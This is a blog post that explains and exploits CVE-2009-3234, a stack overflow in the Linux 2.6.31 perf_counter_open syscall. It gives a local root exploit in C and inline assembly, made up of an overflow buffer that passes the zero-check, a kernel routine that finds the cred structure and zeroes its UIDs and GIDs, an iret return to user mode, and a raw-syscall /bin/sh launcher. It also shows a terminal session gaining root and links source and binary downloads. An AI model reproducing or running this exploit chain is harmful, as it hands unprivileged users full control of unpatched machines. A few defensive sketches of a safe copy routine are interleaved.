Linux kernel 2.6.31 perf_counter

Well, it has been a while since my last technical post ... More than 1 year ?!? Wow, time runs so fast :)

So let's go for a post about Linux kernel exploitation (yeah, I know, sounds cool). We will exploit a fairly recent bug in kernel 2.6.31 (still unpatched at the time of writing) in the perf_counter_open syscall (CVE-2009-3234) to gain root privileges. As real hackers say, f34R.

But let's start at the beginning: the bug.

perf_copy_attr and the dual fail

The perf_copy_attr function is meant to copy a data structure (of type perf_counter_attr) from user space to kernel space. Its prototype is:

static int perf_copy_attr(struct perf_counter_attr __user *uattr,
                          struct perf_counter_attr *attr)

Here uattr is a pointer to the (source) user space structure, and attr is a pointer to the (destination) kernel space structure.

Here is the perf_copy_attr code:

static int perf_copy_attr(struct perf_counter_attr __user *uattr, struct perf_counter_attr *attr)
{
  [...]
  u32 size;
  [...]
  ret = get_user(size, &uattr->size);
  [...]
  /*
   * If we're handed a bigger struct than we know of,
   * ensure all the unknown bits are 0.
   */
  if (size > sizeof(*attr)) {
    unsigned long val;
    unsigned long __user *addr;
    unsigned long __user *end;

    addr = PTR_ALIGN((void __user *)uattr + sizeof(*attr), sizeof(unsigned long));
    end  = PTR_ALIGN((void __user *)uattr + size, sizeof(unsigned long));

    for (; addr < end; addr += sizeof(unsigned long)) {
      ret = get_user(val, addr);
      if (ret)
        return ret;
      if (val)
        goto err_size;
    }
  }

  ret = copy_from_user(attr, uattr, size);
  [...]
}

Let's look at what is happening.

First, size is read from the user-supplied structure:

ret = get_user(size, &uattr->size);

Then, size bytes are copied from the user buffer pointed to by uattr into the kernel buffer pointed to by attr:

ret = copy_from_user(attr, uattr, size);

This means that if the user supplies a uattr whose uattr->size is greater than the size of the buffer pointed to by attr, that buffer will be overflowed. That's the first fail.

But between those two statements, there is a comment followed by a block of code. The comment says:

/*
 * If we're handed a bigger struct than we know of,
 * ensure all the unknown bits are 0.
 */

Without reading the code, you would think that you can only overflow the buffer with zeros, which, while not making exploitation impossible, makes it more difficult. But if you read the code, you will see this:

unsigned long __user *addr;

for (; addr < end; addr += sizeof(unsigned long)) {
        ret = get_user(val, addr);
        if (ret)
                return ret;
        if (val)
                goto err_size;
}

Pointer arithmetic scales by the size of the pointed-to type: adding 1 to a pointer moves it forward by one whole element. So addr += sizeof(unsigned long) advances addr by 4*4 = 16 bytes on a 32-bit system. This means that the loop only checks that 1 long out of every 4 is zero.
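
To make the stride concrete, here is a small user-space sketch (not kernel code) that reproduces the loop's pointer arithmetic. The function names scan_buggy, scan_every_word and stride_in_bytes are made up for this illustration, and plain memory reads stand in for get_user.

```c
#include <assert.h>
#include <stddef.h>

/* Same stepping as the kernel loop: the pointer moves forward by
 * sizeof(unsigned long) *elements* per iteration, not by one element.
 * Returns 1 if a non-zero word was seen, 0 otherwise. */
int scan_buggy(const unsigned long *addr, const unsigned long *end)
{
    const size_t step = sizeof(unsigned long);

    assert(addr <= end);
    while (addr < end) {
        if (*addr)
            return 1;
        /* Stop before the pointer would move past the end of the buffer. */
        if ((size_t)(end - addr) <= step)
            break;
        addr += step;
    }
    return 0;
}

/* What the comment in perf_copy_attr promises: every word is inspected. */
int scan_every_word(const unsigned long *addr, const unsigned long *end)
{
    assert(addr <= end);
    for (; addr < end; addr++)
        if (*addr)
            return 1;
    return 0;
}

/* Number of bytes covered by one "addr += sizeof(unsigned long)". */
size_t stride_in_bytes(void)
{
    unsigned long words[sizeof(unsigned long) + 1] = {0};
    unsigned long *p = words;
    unsigned long *q = p + sizeof(unsigned long);

    return (size_t)((char *)q - (char *)p);
}
```

On a 32-bit build stride_in_bytes() returns 16. A buffer whose only non-zero word sits at index 1 passes scan_buggy, while scan_every_word rejects it.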

That's the second fail.
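
For contrast, here is a user-space sketch of a copy that closes both holes: it inspects every trailing byte and never copies more than the destination can hold. This is an illustration with hypothetical names (copy_attr_checked and its parameters), with memcpy standing in for copy_from_user and -E2BIG chosen as the error value for the example. It is not the actual kernel patch.

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>
#include <string.h>

/* Copy a caller-described structure of claimed_size bytes into a destination
 * of dst_size bytes. Extra trailing bytes are accepted only if they are all
 * zero, and they are never copied. Returns 0 on success, -E2BIG otherwise. */
int copy_attr_checked(void *dst, size_t dst_size,
                      const void *src, size_t claimed_size)
{
    const unsigned char *bytes = src;
    size_t i;

    assert(dst != NULL && src != NULL);

    if (claimed_size > dst_size) {
        /* Inspect every unknown byte, one at a time. */
        for (i = dst_size; i < claimed_size; i++)
            if (bytes[i] != 0)
                return -E2BIG;
        /* Clamp: the destination only has room for dst_size bytes. */
        claimed_size = dst_size;
    }

    memcpy(dst, src, claimed_size);
    return 0;
}
```

The clamp is what removes the overflow. The per-byte check only decides whether an oversized structure is accepted at all.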

Exploitation

Note:

If you are not comfortable with stack-based buffer overflows, you should first read the famous article by Aleph1: Smashing The Stack For Fun And Profit

The interesting thing for us is that perf_copy_attr is called directly from the perf_counter_open syscall and that the destination buffer is on the stack, so it's a typical stack-based buffer overflow:

SYSCALL_DEFINE5(perf_counter_open,
                struct perf_counter_attr __user *, attr_uptr,
                pid_t, pid, int, cpu, int, group_fd, unsigned long, flags)
{
[...]
        struct perf_counter_attr attr;
[...]
        ret = perf_copy_attr(attr_uptr, &attr);
[...]

Now, let's have a look at the perf_counter_attr structure:

/*
 * Hardware event to monitor via a performance monitoring counter:
 */
struct perf_counter_attr {
        __u32                   type;
        __u32                   size;
[...] /* Total struct length: 64 bytes */

To trigger the overflow and hijack the kernel code flow, we need to build an attr buffer such that:

attr.size > sizeof(struct perf_counter_attr)
After the first 64 bytes of our buffer, zeroes are placed wherever the loop in perf_copy_attr looks, so it does not kick us out
The perf_counter_open return address on the stack is overwritten with the address of our code

Modifying the kernel code flow

Note:

Before continuing, remember that the Linux kernel shares the address space of the current process, so you can access your process's memory from the kernel almost as easily as from your own program.

The following code is fairly self-explanatory. We start by setting attr.size to 128; then the first loop fills the part of attr that will overflow with the address we want to jump to once in kernel land, and the second loop puts 0s where needed so that we pass the check loop in perf_copy_attr. At the end, we just make the perf_counter_open syscall.

#define SIZEOF_ATTR 64
#define BUFFER_LEN 128

void start()
{
        uint32_t *attr = malloc(BUFFER_LEN);
        uint32_t *stack_overflow = (void *)attr + SIZEOF_ATTR;
        uint32_t *aligned_overflow = PTR_ALIGN(stack_overflow, sizeof(unsigned long));

        memset(attr, 0, SIZEOF_ATTR);

        /* size is the second u32 in the struct */
        attr[1] = 128;

        while (stack_overflow < attr + (BUFFER_LEN / sizeof (*attr)))
        {
                *stack_overflow = (uint32_t)kernel_code;
                stack_overflow ++;
        }

        /* then put 0s where we need them ... */
        while (aligned_overflow < attr + (BUFFER_LEN / sizeof (*attr)))
        {
                *aligned_overflow = 0;
                aligned_overflow += 4;
        }

        syscall(__NR_perf_counter_open, attr, 0, 0, 0, 0);
}

So, if all goes well, when the perf_counter_open function returns, the code flow should be redirected to our code, which is executed with kernel privileges (ring0).

The Kernel trip

What we need to do while in ring0 (kernel land) is modify the credentials of our process to get root privileges, then exit the kernel. Once back in ring3 (user land), we will start a shell from our process with root privileges. We start by writing our kernel_code function like this:

void    kernel_code()
{
        update_cred();
        exit_kernel();
}

Upgrading credentials

Credentials of a process are stored in the task_struct. The task_struct is a huge structure holding everything about a process. The current process' task_struct address is always stored on top of the kernel stack - sizeof(long). The task_struct can be laid out in different ways depending on kernel compilation options. So, even with the address of this structure, we cannot calculate the exact position of the credential-related fields. On recent kernels, credentials are stored in a cred structure pointed to by the task_struct.

Here is how the task_struct links the credentials:

struct task_struct {
[...]
/* process credentials */
        const struct cred *real_cred;   /* objective and real subjective task
                                         * credentials (COW) */
        const struct cred *cred;        /* effective (overridable) subjective task
                                         * credentials (COW) */
[...]

And here is the cred structure:

struct cred {
        atomic_t        usage;
        uid_t           uid;            /* real UID of the task */
        gid_t           gid;            /* real GID of the task */
        uid_t           suid;           /* saved UID of the task */
        gid_t           sgid;           /* saved GID of the task */
        uid_t           euid;           /* effective UID of the task */
        gid_t           egid;           /* effective GID of the task */
        uid_t           fsuid;          /* UID for VFS ops */
        gid_t           fsgid;          /* GID for VFS ops */
        unsigned        securebits;     /* SUID-less security management */
        kernel_cap_t    cap_inheritable; /* caps our children can inherit */
        kernel_cap_t    cap_permitted;  /* caps we're permitted */
        kernel_cap_t    cap_effective;  /* caps we can actually use */
        kernel_cap_t    cap_bset;       /* capability bounding set */
#ifdef CONFIG_KEYS
        unsigned char   jit_keyring;    /* default keyring to attach requested
                                         * keys to */
        struct key      *thread_keyring; /* keyring private to this thread */
        struct key      *request_key_auth; /* assumed request_key authority */
        struct thread_group_cred *tgcred; /* thread-group shared credentials */
#endif
#ifdef CONFIG_SECURITY
        void            *security;      /* subjective LSM security */
#endif
        struct user_struct *user;       /* real user ID subscription */
        struct group_info *group_info;  /* supplementary groups for euid/fsgid */
        struct rcu_head rcu;            /* RCU deletion hook */
};

As you may have noticed, task_struct links two cred structures. Under normal circumstances, the two pointers have the same value and thus point to the same cred structure.

This, plus the very particular layout of the cred structure with all the UIDs/GIDs side by side, gives us a recognizable signature. We can find the cred structure's address by walking the task_struct, searching for two adjacent fields that have exactly the same value and look like pointers to objects in kernel memory.

Then we check whether the pointed-to memory looks like a cred structure by looking at the run of UIDs/GIDs. Once the cred structure is found, we just have to put 0s in the UIDs and GIDs to give our process root privileges.

Here is the code of our update_cred function:

static void update_cred()
{
        uint32_t        i;
        uint32_t        *task = get_current(); /* Pointer to the task_struct */
        uint32_t        *cred = 0;

        for (i = 0; i < 1024; i++)
        {
                cred = (uint32_t *)task[i];
                if (cred == (uint32_t *)task[i+1] && cred > (uint32_t *)0xc0000000) {
                        cred++; /* Skip the cred's 'usage' field */
                        if (cred[0] == uid && cred[1] == gid
                            && cred[2] == uid && cred[3] == gid
                            && cred[4] == uid && cred[5] == gid
                            && cred[6] == uid && cred[7] == gid)
                        {
                                /* Get root */
                                cred[0] = cred[2] = cred[4] = cred[6] = 0;
                                cred[1] = cred[3] = cred[5] = cred[7] = 0;
                                break;
                        }
                }
        }
}

Well, we now need to go back to our process ...

Exiting kernel

Exiting the kernel is not difficult: all we have to do is prepare the stack and execute the iret instruction.

As defined in the Intel manuals, iret returns control to the interrupted program. When iret returns to a less privileged level, the processor pops values from the stack into the EIP register, the CS segment register, the EFLAGS register, the ESP register and finally the SS segment register. The segment registers and EFLAGS are set to "standard" values, while ESP is given the address of a memory buffer defined in our program (exit_stack) and EIP the address of our spawn_shell function.
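
The five values popped by iret can be pictured as a struct laid over the top of the stack. This is only a descriptive sketch for 32-bit protected mode; the name iret_frame is made up here and does not come from the exploit or the kernel.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Stack contents consumed by iret when it returns to a less privileged
 * level on 32-bit x86, lowest address (top of stack) first. */
struct iret_frame {
    uint32_t eip;    /* 0x00: where execution resumes */
    uint32_t cs;     /* 0x04: code segment selector */
    uint32_t eflags; /* 0x08: flags register */
    uint32_t esp;    /* 0x0c: stack pointer to restore */
    uint32_t ss;     /* 0x10: stack segment selector */
};

/* Compile-time checks that the layout matches the pop order. */
static_assert(offsetof(struct iret_frame, eip) == 0x00, "eip is popped first");
static_assert(offsetof(struct iret_frame, ss) == 0x10, "ss is popped last");
static_assert(sizeof(struct iret_frame) == 20, "five 32-bit slots");
```

The offsets 0x00 to 0x10 are the same ones that exit_kernel writes to relative to ESP.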

Once the iret instruction has executed, we are back in our program, at the start of the spawn_shell function, in user mode with root privileges.

Here is the code:

static void exit_kernel()
{
        __asm__ __volatile__ (
        "movl %0, 0x10(%%esp) ;"
        "movl %1, 0x0c(%%esp) ;"
        "movl %2, 0x08(%%esp) ;"
        "movl %3, 0x04(%%esp) ;"
        "movl %4, 0x00(%%esp) ;"
        "iret"
        : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
            "i" (USER_CS), "r" (spawn_shell)
        );
}

Last, but not least ... spawning a shell !

Now we are back in user land (ring3). As we changed our stack address and clobbered some segment registers (like GS), we cannot rely on the libc, so we start our shell with raw syscalls written in assembly.

It's quite simple: a write syscall to print a message, then an execve syscall to start the shell.

spawn_shell:

static inline void spawn_shell()
{
        static char *s = "Starting shell\n";
        static char *t[] = {"/bin/sh", 0};

        my_syscall(SYS_write, 1, (unsigned int)s, mystrlen(s), 0, 0);
        my_syscall(SYS_execve, (unsigned int)*t, (unsigned int)t, 0, 0, 0);
}

my_syscall:

unsigned int my_syscall(unsigned int nb, unsigned int arg1, unsigned int arg2,
                        unsigned int arg3, unsigned int arg4, unsigned int arg5)
{
        unsigned int ret;
        __asm__ (
        "mov %1, %%eax ;"
        "mov %2, %%ebx ;"
        "mov %3, %%ecx ;"
        "mov %4, %%edx ;"
        "mov %5, %%esi ;"
        "mov %6, %%edi ;"
        "int $0x80 ;"
        "mov %%eax, %0 ;"
        : "=r" (ret)
        : "m" (nb), "m" (arg1), "m" (arg2), "m" (arg3), "m" (arg4), "m" (arg5)
        );
        return ret;
}

And we are done !

You should now have a root shell :) This is the result on an Ubuntu Jaunty host with a 2.6.31 kernel (from the Ubuntu repositories):

xipe@tomate:~/exploit$
xipe@tomate:~/exploit$ id
uid=1000(xipe) gid=1000(xipe) groups=4(adm),20(dialout),24(cdrom),29(audio),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(xipe)
xipe@tomate:~/exploit$ ./sys_perf_counter_open_sploit
Starting shell
# id
uid=0(root) gid=0(root) groups=4(adm),20(dialout),24(cdrom),29(audio),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(xipe)
# uname -a
Linux tomate 2.6.31-10-generic #34-Ubuntu SMP Wed Sep 16 00:23:19 UTC 2009 i686 GNU/Linux
#

Exploit code

The exploit code and binary can be found here: Download source

Download binary

That's all folks ! Have fun !

redstack
